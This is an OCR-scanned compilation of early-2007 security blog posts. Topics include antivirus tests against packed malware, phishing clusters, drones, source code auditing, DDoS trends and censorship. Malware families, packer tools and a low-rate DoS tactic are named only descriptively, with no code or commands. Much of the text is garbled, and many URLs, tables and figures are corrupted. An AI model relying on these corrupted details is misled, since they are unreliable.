
The billion-dollar weapons system will be unable to function in case of an ELINT attack, nota 
software backdoor taking the statistical approach. 


There’s an important point to keep in mind, during WWII, the [2]U.S attacted Europe’s brightest 
minds who later on set the foundations for the U.S becoming a super power. Still, you cannot 
expect to produce everything on your own, and even hope of being more efficient in producing 
a certain product in the way someone who specialized into doing this, can. Start from the 
basics, what type of OS does your Intelligence angency use in order not to have to build a 
new one and train everyone to use it efficiently? Say it with me.. Moreover, the sound module 
in your OS has as a matter of fact already been outsourced to somewhere else, if you try to 
control the process with security in mind, vendors will cut profit margin sales, as they will have 
to pay more for the module, will increase prices slowing down innovation. But of course it will 
give someone a very false feeling of security. 


Fears due to outsourced software? Try budgeting with the secondary audits "back home" if 
truly paranoid and want to remain cost-effective. While it may be logically more suitable 
to assume "coded back home means greater security and less risk", you'll be totally wrong. 
All organizations across the world connect using standart protocols, and similar operating 
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systems, making them all vulnerable to a single threats of what represent today’s network 
specific attacks. And no one is re-inventing the OSI model either. 


You can also consider another task force, one that will come up with layered disinforma- 


tion channel tactics when they find out such a backdoor, as detecting one and simply 
removing it on such systems would be too impulsive to mention. 


1. http://www. computerworld.com/action/article.do?command=viewArticleBasickarticleId=274599 


2. http://en.wikipedia. org/wiki/Science_and_technology_in_the_United_States#Science_immigratio 


3.1.27 Testing Anti Virus Software Against Packed Malware (2007-01-25 18:30) 


Vim ynaxormwka Bepcun ynaroei nia 

Dropper ier CC” 
FSG Ver 2.0 (24.05.2004) 
MEW Ver 11 SEVI2 
Morphine Ver 27 
INsPack Ver 3.7 (2005) 
Obsidium Ver 1.2.5.0(2004) 
ORIEN Ver 2720 
PESpin Ver 1304 
Petite Ver 2.3 (2005) 


Very interesting idea as [1]packed malware is something rather common these days, 
and as we’ve seen the recent use of commercial packers in the "[2]skype trojan" 
malware authors are definitely aware of the concept. [3]What the authors did 
was to pack the following malware using 21 different packers/software protectors - 
Backdoor.Win32.BO _Installer, Email-Worm.Win32.Bagle, Email-Worm.Win32.Menger, Email- 
Worm.Win32.Naked, Email-Worm.Win32.Swen, Worm.Win32.AimVen, Trojan-PSW.Win32.Avisa, 
Trojan-Clicker.Win32.Getfound, and scan them with various anti virus software to measure 
which ones excel at detecting packed malware. What some vendors are best at detecting 
others doesn’t have a clue about, but the [4]more data to back up your personal experience, 
the better for your decision-making. 


1. ftp: / 7 ant i-nalvare,ru/doc/packers_support 08.2006 pail 
2. http: //ddanchev. blogspot . com/2007/01/technical-analysis-of-skype-trojan. htm] 
3. hetp://anticnalvare.ru/index.phtlparv=tests 

4, hevp:/ /avv.anticnaluare.ru/doc/packers, support 08.2006 x18 
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3.1.28 Visual Thesaurus on Security (2007-01-26 17:19) 


bravery 


fearlessness 


oO security system 
protection 


security measures 


@ @ 
@) 
@) 
e security « 
1 
surety oO : © 
: security department 
insecurity 
@ (e) 
certificate 
) 
safety 


In case you haven't heard of the [1]Thinkmap Visual Thesaurus, it’s an "interactive dictionary 
and thesaurus which creates word maps that blossom with meanings and branch to related 
words. Its innovative display encourages exploration and learning. You’ll understand language 
in a powerful new way." With its current database size and outstanding usability build into the 
interface, it has a lot of potential for growth, and I’m sure you'll find out the same if you play 


with it for a little while. 


1. http: //www.visualthesaurus.com/ 
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3.1.29 Clustering Phishing Attacks (2007-01-26 18:06) 


O4.12523.14" 
195. 20.247.155 


diffs 
nea 


[1]Clustering a phishing attack to get an [2]in-depth and complete view on the inner workings 
of a major phishing outbreak or a specific campaign only - that’s just among the many other 
applications of the [3]lnternetPerils. Backed up with neat visualization features, taking a 
layered approach, thus, make it easier for analysts do their jobs faster, its capabilities are 
already scoring points in the information security industry : 


"InternetPerils has discovered that those phishing servers cluster, and infest ISPs at the same 
locations for weeks or months. Here’s an example of a phishing cluster in Germany, ever- 
changing yet persistent for four months, according to path data collected and processed 
by InternetPerils, using phishing server addresses from the Anti-Phishing Working Group 
[4](APWG)repository. The above animation demonstrates a persistent phishing cluster de- 
tected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG 
repository, the earliest shown 17 May and the latest 20 September. This phishing cluster con- 
tinues to persist after the dates depicted, and InternetPerils continues to track it." 


Here are seven other [5]interesting anti-phishing projects, and a [6]hint to the ISPs who really 
want to know what their customers are (unknowingly) up to. 


ttp://www.internetperils.com/perilwatch/20060928. php 
ttp://www.internetperils.com/perilwatch/20050421 . php 
ttp://www.internetperils.com/ 


1. 
2: 
3. 
4. 
5. 
6. 


ttp://ddanchev.blogspot.com/2006/09/interesting-anti-phishing-projects.htm 


ttp://www.internetperils.com/products/phishcam. php 
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3.2 February 


3.2.1 PR Storm (2007-02-01 15:31) 


Great to see that [1L]Mike Rothman and [2]Bill Brenner know how to read between the lines. 
Here’s a related point of view on the Storm Worm - [3]Why do users still receive attachments 
they are not supposed to click on? 


Meanwhile, [4]Eric Lubow (Guardian Digital, Linuxsecurity.com) have recently joined the 
security blogosphere and I'll be keeping an eye on his blog for sure - hope it’s mutual. Two 
more rather fresh blogs worth reading are [5]ITsecurity.com’s one - how’s it going Kev - and 
[6]Panda Software’s blog. And with PandaLabs now blogging, the number of anti virus vendors 
without a blog, namely still living in the press release world is getting smaller. | remember 
the last time | was responsible for writing press releases for a vendor I'd rather not associate 
myself with, and how Web 1.0 the whole practice was. If you really want to evolve from 
branding to communicating value, hire a blogger that’s anticipating corporate citizenship 
given he’s commissioned, and reboot your PR channels. 


1 
2 
3 

4 

5 

6 
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3.2.2 Old Media VS New Media (2007-02-01 15:58) 
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The never ending war of [1]corporate interests between [2]the old and the new media, seems 
to be re-emerging on a weekly basis. Obviously, newspapers don’t really like Google picking 
up their content and making money without giving them any commissions - they don’t even 
have to - and with more shortsighted local newspaper unions asking Google and Yahoo! 
to stop doing so, I’m so looking forward for the moment in the near future when we’ll be 
discussing their will to get crawled again. You fear what you don’t understand, and the 
old media doesn’t like the way it got re-intermediated, thus losing its overhyped content 
generation exclusiveness. In a Web 2.0 world, everyone generates content, which later on 
gets mixed, re-mixed, syndicated and aggregated, what if newspapers really tried to adapt 
instead of denying the future? And isn’t it ironic that the newspapers that want to be removed 
from any search engine’s index, are later on using these search engines while investigating 
for their stories? 
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Here’s a lengthy comment | recently made on the [3]Jold media vs the new one. 


1. http: //www.webpronews.com/insiderreports/searchinsider/wpn-49-20070119BelgiansNowFightingWithYahoo.htm 


2. http://www. infoworld.com/article/07/01/19/HNnewspapersgoafteryahoo_1.htm 
3. http: //www.techdirt .com/articles/20070112/105914. shtm 


3.2.3 The TalkRization of My Blog (2007-02-01 18:18) 


alK- 


Letting blogs speak for themselves te Oe - 
[1] The service is quite intuitive for a free one, and | 


must say | never actually got the time to run a podcast on my one, so TalkR seems like the 
perfect choice for those of you - including me - who want to listen to my blog posts. Here’s 
the [2]TalkR feed URL for you to syndicate, and several samples : 


- [3]Social Engineering and Malware 

- [4]The Life of a Security Threat 

- [5]Russia’s Lawful Interception of Internet Communications 

- [6]Foreign Intelligence Services and U.S Technology Espionage 
- [7]Technical Analysis of the Skype Trojan 

- [8]Old Media VS New Media 


By the way, when was the last time you met a girl who speaks stuff like this? 


1 

2. http://www. talkr .com/app/cast_pods .app?feed_id=26043 
3, heep://ww taller. con/audio/@/a/a/¢/975542.0p3 

4, hétp:/ wmv. talc .con/audio/@/a/n//964269.mp3 

5. http://w. taller.con/audio/@/a/a/e/964201.0p3 

6, http://www tall. com/audio/@/a/n/c/964286.0p3 

7. peep: / www aller. com/audio/@/a/0//964287 .9p3 

8. beep: //ww talker. con/audio/@/a/a/¢/989736.5p3 


3.2.4 Attack of the Biting UAVs (2007-02-02 18:40) 


Remotely controlled [l]Junmanned aerial vehicles have been shifting usability from defen- 
sive(reconnaissance) to offensive([2]weapons payload) for the last several years. Working 
prototypes in the shadows of secrecy reaching yet another long-range flight milestone are 
setting up the foundations for a [3]different kind of warfare. And while the concept has the 
potential of saving lifes, and of course taking some while protecting the pilot, it will take 
several more years before fleets of drones are fully capable of integrating their benefits in the 
NCW field. 

Here’s an in-depth article on the [4]Jevolution of UAVs to UCAVS : 


"Robotic air vehicles are beginning to replace some of the Air Force’s manned combat 
aircraft. Soon, they will be handling a major share of the service’s strike mission. The 
first steps in this transition already have been taken in the field of fighter-class aircraft. 
Classified projects now in development seem sure to cut into the manned medium and heavy 
bomber roles, as well. The Predator MQ-1 is leading this transition. A familiar feature of 
Air Force combat operations for more than a dozen years, the spindly Predator has evolved 
dramatically. It is no longer simply a loitering “eye in the sky” but rather a versatile weapon 
system capable of destroying a couple of ground targets on its own or in collaboration with 
other aircraft. It is in great demand, and the Air Force is acquiring Predators as fast as 
it can absorb them. Now in early production is a souped-up version of the Predator, the 
MQ-9 Reaper. Its combat payload—missiles and bombs carried on underwing hardpoints— 
roughly equals that of an F-16 fighter. In the Reaper, the Air Force has found a craft that truly 
combines the powers of a potent strike fighter with the capabilities of a reconnaissance drone." 


You may also be curious on why the U.S Department of Agriculture is interested in buy- 
ing some the way | am - perhaps a sci-fi insects invasion. What would the next logical 
evolution of UCAVs be? That’s [5]JUCAVs capable of electronic warfare attacks, and with their 
flight durability and flexibility of operation, the idea will receive more acceptance as the 
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technology matures. There’s also something else to keep in mind, and that’s the interest 
and active [6]research of various terrorist organizations in UAVs. And while [7]they wouldn’t 
sacrifice $7M for a drone, even be able to get hold of one - unless Iran supplies - cheap 
alternatives such as the [8]Spy X plane are already taken into consideration, at least for 
reconnaissance purposes. Yes they’re cheap, and yes they’re easy to jam, you can even hear 
them coming, but the trend is worth mentioning. 


http: //en.wikipedia. org/wiki/Unmanned_aerial_vehicle 


ttp://en.wikipedia.org/wiki/Unmanned_Combat_Air_Vehicle 

| 
| 

| 


ttp://sfir-arabicsource.blogspot.com/2007/01/fly-and-spy-by-wireless .htm 


. http: //ddanchev. blogspot .com/2006/09/hezbollahs-use-of-unmanned-aerial .htm 


http: //cgi.ebay.co.uk/Remote-Controlled-Spy-X-Plane-With-Digital-Camera_WOQQitemZ110081662428QQihZ001QQca 


egoryZ19164QQcmdZViewItem 
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3.2.5 Interactivity by Default (2007-02-06 19:38) 


cyberpunkreview.com/ Options 
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ight milestone are setting up the 
foundations for a different kind of warfare. And while the concept CSO Online 
has the potential of saving lifes, and of course taking some while 
protecting the pilot, it will take several more years before fleets of DallasCon 
drones are fully capable of integrating ther benefits in the NCW field. del.icio.us 


Here’s an in-depth article on the evolution of UAVs to UCAYS : E-Commerce Times 


" — : , : Electronic Frontier Foundation 
Robotic ar vehicles ae begiwiig to replace some of the Ar Force's 
combat arcraft. Soon, oy wall be handing 2 major share of 
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Federation of American 


Proud to be operating in a Web 2.0 world, I’m continuing to integrate features to make the 
reading of this blog more interactive, less time consuming, and much more easy to navigate. 
After [1]del.icio.us and [2]TalkR, here comes [3]Snap : 


"Snap Preview Anywhere enables anyone visiting your site to get a glimpse of what other sites 
you’re linking to, without having to leave your site. By rolling over any link, the user gets a 
visual preview of the site without having to go there, thus eliminating wasted "trips" to linked 
sites." 
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Enjoy! 


1. http://del.icio.us/DDanchev?setcount=100 
2. http://www.talkr.com/app/cast_pods.app?feed_id=2604 
3. http://www.snap.com/ 


3.2.6 Automated Detection for Patterns of Insecurities (2007-02-08 21:15) 
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While there’re lots of [1]pros and [2]cons to [3]consider when it comes to automated source 
code scanning, [4]Fortify’s pricey automated source code analysis tool has the potential to 
prevent the most common vulnerabilities while the software’s still in the development phrase. 
Recently, they’ve added [5]34 new categories of vulnerabilities to their product : 


"Thanks to this effort, Fortify Software continues to lead the industry by identifying over 
150 categories of vulnerabilities in software. 

The updated Secure Coding Rulepacks include: * Increased breadth: 34 new distinct vul- 
nerability categories. * Enhanced support for .NET: 24 new vulnerability categories and 
coverage for five new third-party libraries, including the Microsoft Enterprise Library. * 
Expanded JSP support: Coverage for popular tag libraries, including JSTL and Apache Struts, 
for enhanced protection from cross-site scripting and SQL injection attacks. * Detection of 
persistent Cross-Site Scripting vulnerabilities: Fortify SCA now detects one of the most com- 
mon and difficult to identify forms of cross-site scripting, which occurs when malicious data 
from an attacker is stored in a database and later included in dynamic content sent to a victim." 


But how come small to middle size application vendors aren’t really considering the use 
of such automated scanning tools? Overempowerment and trust in their developers’ abilities? 
Not at all. The problem is the lack of incentives for them to do so, but what they’re missing is 
a flow of soft dollars - a PR boost - if they were to communicate the efforts undertaken to ship 
their products audited, and hopefully, products free of brain-damaging bugs. 


725 


In respect to the relatively immature market segment for software auditing, Fortify is 
perfectly positioned to even start fuzzing applications for their customers enjoying their 
almost pioneer advantage. Or even better, perhaps their customers should consider the 
concept for themselves. All rest is the endless full disclosure debate, researchers pushing 
for accountability, and vendors - legally - [6]thinking they’re on war with them, fighting 
back however they can. You may also find a related post on how [7]prevalence of XSS vul- 
nerabilities by Michael Sutton informative, and the [8]following posts worth [9]the read as well. 


The bottom line question - [10]Can Source Code Auditing Software Identify Common VWul- 
nerabilities? It sure can, but never let a scanner do a developer’s job or forward [11]secure 
coding practices to a third-party. 


1, ftp: //osvab org/blog/*p-t07 
2. heep:/ /awy. codescan.con/Library/Source_ Code, Scannere_The_ Case, pal 

3. http: //jeremiahgrossman. blogspot .com/2007/01/automated-scanner-vs-owasp-top-ten. html 
4, http://www, fortityectvare.con/ 

5, http: //aiy.earthtines.org/articles/show/uews_press_ release 52123, shtal 

6. http: //en.wikipedia.org/wiki/Michael_Lynn 

7. 


ttp://portal.spidynamics.com/blogs/msutton/archive/2007/01/31/How-Prevalent-Are-XSS-Vulnerabilities_3F00 


8. http: //ddanchev. blogspot .com/2006/07/scientifically-predicting-software htm 
9. http: //ddanchev. blogspot .com/2007/01/four-years-of-application-pen-testing . htm 
10. http://csdl.computer.org/comp/proceedings/hicss/2004/2056/09/205690277 . pdf 
11. http: //www.blackhat.com/presentat ions/bh-europe-06/bh-eu-06-Wheeler-up. pdf 


3.2.7 Receiving Everyone’s Financial Statements (2007-02-08 22:16) 


r 
Bank institutions around the world - stay tuned for [1]wannabe identity thieves requesting 


their statements while hoping you'll forward them everyone else’s ones, in between. Smells 
like an over performing intern to me: 


"An Aberdeen woman who asked for her bank statement was sent details of 75,000 other cus- 
tomers. Stephanie McLaughlan, 22, was sent the financial details by Halifax Bank of Scotland 
(HBOS). She received five packages each containing 500 sheets of 30 customers’ names, sort 
codes and account details. HBOS apologised and said it was carrying out an investigation. 
The Information Commissioner’s Office (ICO) said it would probe the "negligence." 


Obviously, you can too play the [2]U.S Department of Treasury requesting [3]financial 
information [4]from the [5]SWIFT, but in this case - unintentionally. 
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1 
2 

3. 

4 
5, 


ttp://ec.europa.eu/justice_home/fsj/privacy/news/docs/PR_Swift_Affair_28_07_06_en.pdf 


3.2.8 Overachieving Technology Companies (2007-02-12 13:39) 


LE Wurnina biotechnology equipment $39.49 26% 250+%" $145" 
EEE Gooale online search engine 505.00 33 222 9,319 
a Salesforce.com Sales mgmt software 42.42 50 117 444 
ERR Monolithic Power Systems semiconductors 11.74 20 at 111 
ERR attri software 26.92 14 76 215 
= Martek Biosciences nutritional supplements 2417 13 70 271 
Euronet Worldwide banking software 27.67 20 69 B07 
GRRE cephaion biotechnology 70.31 20 65 1,570 
ERE Sonic Solutions software for digital media 17.80 20 59 154 
FO WebEx Communications Internet videoconferencing 35.16 19 59 362 
GEM Websense web security software 24.27 15 51 173 
FERBE celaene biotechnology 55.88 53 47 773 
GEMEE Coonizant Technology Solutions IT services 81.44 35 47 1,257 
PERE vavten digital maps 33.03 25 46 547 
FERRE Disital River E-commerce services 51.87 25 45 286 
EGR Tc Technologies IT services 23.03 15 40 402 
EAM Litecen biotechnology 25.71 35 40% 414124 
18 | Nil Holdings wireless telecom services 65.35 42 35 2,213 
FEMME Genentech biotechnology 86.83 28 344 76404 
20 | DRS Technologies aerospace, defense 55.03 12 34 2,377 
21 | SRA, International government IT services 27.74 20 32 4,203 
EERE Color Kinetics LED lighting systems 2041 35 32 62 
EERE amaen biotechnology 73.27 15 341 13,704 
24 | Online Resources IT services for finance cos 932 25 28 73 
EERE Dolby Laboratories audio technology 33.67 20 26 392 


Great dataset by Forbes - [1]The 25 Fastest-Growing Tech Companies : 


"Our selection process: We require at least $25 million in sales, 10 % annual sales growth for 
five consecutive years, profitability over the past 12 months and 10 % estimated annual profit 
growth for the next three to five years. We exclude firms with significant legal problems or 
other open-ended liabilities and also consider accounting and corporate governance scores 
from Audit Integrity of Los Angeles in making our final cuts." Growth has many dimensions, 
and with any market’s cyclical pattern it’s important to assess the potential for sustainable 
long-term growth based on easy to influence market factors, as the balance of power in the 
tech market can sometimes change very quickly. Being a pioneer doesn’t always count as the 
best alternative, and it’s the companies able to differentiate among fads and emerging trends, 
the ones worth assessing. Diversification in market sectors with higher liquidity such as anti 
virus and perimeter defense, or making a long-term investment, that is positioning yourself 
as the default destination for a need that’s only emerging for the time being remain rather 
popular - and predictable - strategic business moves. [2]Leadership, vision, and courage 
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matter, but [3]money when it comes to innovation doesn’t. Let’s discuss several companies 
worth mentioning whatsoever : 


_Google 

Don’t say cheese, say Google. The company’s continuing to please market analysts with 
steady profits, whose stock ratings bring more investors’ cash into the GoogleMachine and 
with the re-emerging - this time [4]more mature - online advertising market bidding for 
keywords in a world of searching will remain profitable, the question every wonders is - until 
when? The naysayers, or the ones who couldn’t obtain any Google shares constantly talk 
about several buzz words - decline in online advertising, click fraud, and index poisoning. And 
despite the fact that Yahoo’s web properties may be attracting more traffic than Google’s, 
Google’s [5]KISS principle and their vision to set quality search results and up-to-date index 
of the Web as a core competency in times when the Web is growing faster than ever before, 
is an incentive for advertisers and users to both trust, and do business with the company. 
Google may not have a market capitalization as high as Microsoft, but the flow of soft dollars, 
Google’s shares as a fringe benefit and a bargain are winning more respect, attracting quality 
HR, and if that’s not enought, disrupting and making the world a much more transparent place 
to live in. Now that sounds much better than a company that’s always been earning over 50 
% of its revenues from its oldest products - that’s boring profitability. 


_Salesforce.com 

The on demand concept in action. Need processing power? Outsource. Need a large snapshot 
of the Web? Outsource. The very idea of outsourcing a task to someone’s that’s specializing 
in the area is a more cost effective way then you'll ever do, is major driving force. Besides all, 
why create a new CRM system or even advertising system, when there’re standardized and 
already developed and ready to use ones? Salesforce.com is a true case study signalling the 
trend, and with the company empowering developers to contribute concepts, it’s a win-win-win 
situation for everyone involved. Read more [6]here. 


_WebEx Communications 

Some Internet services are often taken for granted, and they should be, but the companies 
that provide these commoditized benefits such as video conferencing, are always in the 
position to generate steady cash flow. Take WebEx Communications. Video conferencing was 
supposed to revolutionize the way people communicate and do business. Have you seen 
a decline in 1st class business travel, or has your company kindly asked you to start video 
conferencing with potential customers in order to cut costs? Now, who'll do business with a 
salesforce whose elevator pitch cannot be verified in the elevator in a face-2-face meeting 
anyway? Trust me, not the type of people you'll feel proud and secure to do business with. 
It’s all about the targeted audience and who'll benefit most from the service in a specific time, 
and in a specific market cycle. Seems like WebEx are either good at sensing the market, or 
it’s the very nature of the service and the level of brand awareness they’ve achieved when it 
comes to online video conferencing. 


_Websense 

Web filtering was a rather hot market segment couple of years ago when there was much more 
transparency in the dark corners of the Web. An URL containing information corporate users 
didn’t really needed to be more productive was easy to spot, and the static nature of the Web 
compared to today’s dynamically changing malicious sites was making it easy for the vendor 
to filter out the bad sites. [7]Real-time evaluation, or sandboxing a site came into play, [8]Web 
2.0 "wisdom of crowds" [9]SiteAdvisor started getting acceptance, [10]Scandoo is slowly 
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gaining ground, vendors such as [11]ScanSafe diversifying already. So how is Websense still 
able to generate such revenue flows? The secret is in their sales force able to not only acquire 
new customers, but to most importantly retain their major ones, and of course diversification 
in market sectors such as data theft prevention. And like companies such as Google, Amazon 
and Ebay, [12]Database as the "Intel Inside" is a major differentiator and can close a lot of 
deals. 


To sum up - don’t disrupt in irrelevance. 


ttp://www.forbes .com/2007/01/25/fastest- growing-stocks-tech_cz_pmjr_0125fasttech_land.htm 


. http://del.icio.us/DDanchev/Leadership 
. http: //ddanchev. blogspot. com/2006/07/things-money-cannot- buy .htm 
. http://del.icio.us/DDanchev/NewMedia 


ttp://www.businessweek.com/smallbiz/content/feb2007/sb20070205_196586 .htm?chan=technology_technologytind 
O cee [fee suse oat] 
8. htp://danchey blogspot. con/2006/02 /Look-#hos-goma-cash-for- evaluating heal 
gees 7seamcuor tigate. con 000/04 apontang valuable cavercoaee- ta meal 


pay 


0. http://www.scandoo.com/ 
11. http://www.networkworld. com/news/2007/020507-scansafe.htm 
12. http://websense.com/global/en/ProductsServices/MasterDatabase/ 


3.2.9 Forensic Examination of Terrorists’ Hard Drives (2007-02-13 04:09) 


During the [1]last year | presented [2]my point of view on [3]the topic in numerous posts, 
in order to debunk the common misunderstanding of [4]Cyberterrorism as an [5]offensive 
concept. And while real-time [6]cyber intelligence can save lifes, a historical forensic exami- 
nation like the this one may act as a case study to further model the behaviour of a terrorists 
before they strike. Here’s a list worth looking up at Archive.org, courtesy of the now deceased 
[7]Madrid bomber Jamal Ahmidan : 


"The below is a list of web sites found to have been visited by Ahmidan or accomplices. The 
list is not inclusive, but merely represents those sites in the indictment the names of which 
the author recognized based on close to five years of routine monitoring of jihadist activity 
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online. Quite a few of these sites were likely to have been "under surveillance" during the time 
when Ahmidan and/or his associates accessed them. Had their IP addresses been reported to 
Spanish authorities at the time these sites were accessed, and had the authorities in Spain 
then followed up on such reports, it is entirely reasonable to expect that the Madrid bombing 
of 11 March 2004 could have been prevented." 


Cyberterrorism is so not overhyped, it’s just a concept discussed from the wrong angle and 
that’s the myth of terrorists using electronic means for killing people. A terrorists’ training 
camp is considered a military target since it provides them the playground to develop their 
abilities. Sooner or later, it will feel the heat and dissapear from the face of the Earth, 
they know it, but don’t care mainly because they’ve already produced and are distributing 
[8]Spetsnaz type of video training sessions. So abusing information or [9]the information 
medium itself is much more powerful from their perspective then destroying their means 
for communication, spread propaganda, and obviously recruit. [10]Real-time open source 
intelligence and accurate risk assessment of specific situations to prioritize the upcoming 
threat given the [11]growing Jihadist web, is what should get more attention compared to data 
retention and data mining. 


Meanwhile, in the real world, events across the globe are sometimes reaching the [12]parody 
stage. [13]Know your enemy, and [14]don’t underestimate his [15]motivation. 


ttp://ddanchev. blogspot .com/2006/10/scada-security-incidents-and-critical.htm 


_ het: //photoet. blogger .con/blogger/1059/1779/1600/Cyber terrorism. jpd 
0. http://adanchey blogspot. con/2006/08/benefits~of-open-source- intelligence. heal 
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1. http: //ddanchev.blogspot.com/2006/12/current-state-of-internet- jihad.htm 
12. http: //www.collegehumor .com/video : 1741589 


vs http: //tajdeed-list.net/pipermail/pir_tajdeed-list.net/2006-June/000092.htm 
http: //www.sciencedirect.com/science?_ob=MImg&_imagekey=B6WGR-4M7VFR8- 1-1&_cdi=6829%_user=10&%_orig=bro 


se&_coverDate=01/31/2007&%_sk=999349998kview=c&wchp=dGLbVz 


15. http: //ddanchev.blogspot.com/2006/12/digital-terrorism-and-hate-2006-cd-rom. html 
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3.2.10 Gender Based Censorship in the News Media (2007-02-13 17:48) 


We Can Do It! 


‘ia™ 


oF 

l= meme” Great perspective. The author Dr. Agnes Calla- 
mard even got the data to prove it. Limiting the freedom of expression for the sake of securing 
political or economic investments - so realistic. When it comes to gender based censorship, 
things have greatly changed during the last decade if you keep an eye on Fortune’s [2]Most 
Powerful Women stats. Sexism is so old-fashioned, and diversity among top management 
has been taking place for a while, moreover, professional oriented women next to the family 
oriented ones are increasing - my type - but then again if all men are alike, and all women too, 
look for the exceptions. And by the way, since when does [3]age became a benchmark for a 
quality point of view or a criteria for knowledge, stereotypes keep you - the baby boomers - 
blindly protected, now aren’t they? Trouble is, some evolve faster then you'll ever do, because 
you are your own benchmark in times when opinionated self-starters make an impact on a 
daily basis. Success is a state of mind, gender doesn’t matter and never did : 


"In particular, the results of the GMMP 2005 show and ARTICLE 19’s own work confirms 
that censorship can be the handmaiden of gender-based power, discrimination and inequality 
and further, that this type of censorship may be exercised via and by the media. This 
gender-based censorship is comprised of dynamics that are both systematic and selective in 
nature, explicit and implicit by expression, intentional and unintentional in outcome and both 
deliberate and thoughtless in impact. It expresses itself in many shapes, colours, and voices. 
But ultimately, like all other forms of censorship, it alters reality, dis-empowers, controls, 
renders invisible, and silences." 


I’m still sticking to my point that if girlss/women didn’t hate each other so much, or let’s 
say be less jealous of one another they could rule the world - they do rule the world as a 
matter of fact, but compared to posers media whoring on a daily basis, I’m convinced they’re 
the true puppet masters behind the curtains, now aren’t they? Just a thought. 


1. http://www.article19.org/pdfs/publications/gender-women-s-day-paper-2006. pdf 
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2. http: //money.cnn.com/magazines/fortune/mostpowerfulwomen/2006/ 


3. http: //money.cnn.com/magazines/fortune/mostpowerfulwomen/2006/age/index. html 


3.2.11 Emerging DDoS Attack Trends (2007-02-14 00:27) 


Target of attack (2 


~~ ~ "2 


In a [1]previous post | emphasized on the long-term trend of how DoS attacks have the 
potential to cause as much damage as a full-scale DDoS attack, and increase their chance 
of not getting detected while require less resources. Looks like [2]Prolexic Technologies are 
thinking in the same direction and warning that : 


"IT security bosses will have to be increasingly vigilant in 2007 as criminals exploit new 
ways of ensuring distributed denial of service (DDOS) attacks cause the maximum damage 
and circumvent filtering technology, according to DDOS protection specialist Prolexic.While 
there will continue to be large-scale consumption-based attacks this year, attackers have 
learned that smaller, customised attacks tailored to web servers’ application logic can have 
similar effects but require smaller botnets to generate, according to Prolexic president Keith 
Laslop."The requests will bring your CPU usage up to 100 percent by doing things 
like registering as a new customer' he said. "There is a slow frequency of requests so 
it will not trigger third-party [detection] technology, and intrusion-detection systems are not 
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designed to notice these attacks." 


[3]Attacks like these while not conducted by malicious parties, are already happening at 
Britain’s Prime Minister web site, though these should have been anticipated earlier. 


As always, assessing risk as if you are a part of a red team provides the best security 
for your network. Think malicious attackers. If they’re able to fingerprint the software running 
on your boxes and get under the skin of your web applications, a surgical and specifically 
crafted DoS attack would not only require less resources compared to a DDOS one, but would 
also make it a little bit harded for incident forensic investigator to react in a timely manner. 
So while you’re preparing for a constant Gbytes stream, attackers will shift tactics. 


Here’s [4]more info on the recent - totally futile - [5Jattempt to attack the [6]root domain 
servers. 


ttp://ddanchev. blogspot .com/2006/02/war-against-botnets-and-ddos-attacks.htm 


1. 
2. http://www.prolexic.com/news/20070129-itweek.php 
3: ttp://www.dailymail.co.uk/pages/live/articles/news/news.html?in_article_id=435693kin_page_id=1770&amp ;a 


p;amp ; ico=Homepage&icl=TabModulekicc=NEWS&ct= 


. http://dnsmon.ripe.net/dns-servmon/domain/plot?domain=root&day=5&month=2kyear=2007khour=16&period=48hk&plo 
5. hep: / ise. sans org/Alary phptstoryia-216d 
6. nvep://acbonews .coa/stories/2007/02/06/vech/asin240087. shell 


3.2.12 She Loves Me, She Loves Me Not (2007-02-14 23:13) 


I’m in love, with myself at the first place, and while Saint Valentine’s meant to reboot a 
relationship so to speak, every day should be a Saint Valentine’s day in a relationship. Do you 
[1]trip on love? [2]Malware authors always [3]do around the [4]14th of February. 


Quote of the day - No promises, no demands, [5]love is a battlefield - [6]Jor drug like addiction? 
Via [7]Tech Space. 


ttp://www.lyricsondemand.com/soundtracks/c/cruelintentionslyrics/triponlovelyrics.htm 
ttp://isc.sans.org/diary.php?storyid=2241 


1. 
2. 
3. http: //www.informationweek.com/news/showArticle. jhtml?articleID=197006139&%subSection=Breaking+News 
4. 
Di 


ttp://www.f-secure.com/weblog/#00001112 
ttp://www.stlyrics.com/lyrics/13goingon30/loveisabattlefield.htm 
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6. http://online.wsj.com/public/article_print/SB117131067930406235-bGy4cOTRQJG9Lm7 yGO7vGevbH1M_20080212.htm 


7. http://blogs.usatoday.com/techspace/2007/02/coffee_break_fe_7.htm 


3.2.13 Censorship in China - An Open Letter (2007-02-14 23:38) 


IP 


An [1]open letter to Google’s Founders regarding the censorship of search results in China : 


"During the National Day holiday week in 2002, when Google.com was blocked in China 
for the first time, Chinese Google users made an online protest spontaneously. They appealed 
to free the purer search engine wave by wave. Its seemed its also the first time grassroots 
power was demonstrated in China on Internet. You can imagine how eager they are to have a 
complete Internet instead of a shrunken one. At last, people won, Google backed. However, 
after 4 years, we started to question whether we should continue to support Google. Many 
users here were disappointed when they found Google.cn filtered many keywords. The 
compromise remarks by you in Davos made us more frustrated. Seems you are adopting 
self-censorship which hurts those loyal users a lot which also devalue your motto of "non-evil"." 


Issues to keep in mind: 

- Yahoo and Microsoft are doing it too in order to continue their business operations in China 

- Google is alerting the searcher that the results are filtered because the ghost of Mao is alive 
and kicking and said so 

- [2]Google’s losing market share in China’s search market next to Sina.com due to [3]censor- 
ship concerns, while local users are forgetting that Sina.com too is censoring the results, even 
worse, not even crawling as deep as Google is in respect to the quality of search results 

- U.S [4]Congressman Chris Smith has the issue on his agenda 

- [5]Technology companies are seeking government assistance on how to stop the [6Jongoing 
censorship themselves 

- The [7]complete list of censored search results is worth going through 

- [8]Google’s and Yahoo’s shareholders are fighting back 

- [9]The Great Firewall is cracking from within with banned journalists now running the largest 
blogging network in China 


http: //www.isaacmao.com/meta/2007/02/open-letter-to-google-founders-to-save.htm 
ttp://business. guardian.co.uk/story/0, , 1999900, 00. htm 


ttp://arstechnica.com/news .ars/post/20070131-8739.htm 


http: //ddanchev. blogspot .com/2006/08/chinas- internet-censorship-report- 2006. htm 
ttp://ddanchev. blogspot .com/2006/12/google-and- yahoos- shareholders-against.htm 


1. wi . - - 

2. : i : i ; 

3 

a 
: 

6. : ica. - : 

7. i - ip- 

8. 
9. 


ttp://ddanchev. blogspot .com/2007/01/its-all-about-vision-and-courage-to.htm 
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3.2.14 RFID Tracking Miniaturization (2007-02-15 01:07) 


u-Chip 
0.4mmx0.4mm 


First it was [1]RFID tracking ink, now with the introduction of the new generation Hitachi 
mu-chips, miniaturization proves for yet another time it has [2]huge privacy implications : 


"On February 13, Hitachi unveiled a tiny, new “powder” type RFID chip measuring 0.05 x 0.05 
